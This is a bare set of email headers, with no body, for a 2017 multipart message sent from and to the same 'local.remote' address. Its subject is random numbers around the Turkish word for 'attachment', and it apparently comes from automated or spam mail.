Thread-Topic: 86107.421989471 Eklenti  12963.9537323045
From: "YTGH 2" <yoxlanis@local.remote>
To: <yoxlanis@local.remote>
Subject: 86107.421989471 Eklenti  12963.9537323045
Date: Tue, 7 Feb 2017 17:00:00 -0800
Message-ID: <7BF0921BF00E4A099B7AB48A87995B7E@PSPUBWSPC>
MIME-Version: 1.0
Content-Type: multipart/mixed;
.boundary="----=_NextPart_000_0001_01D28163.9E8AD610"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: Normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17514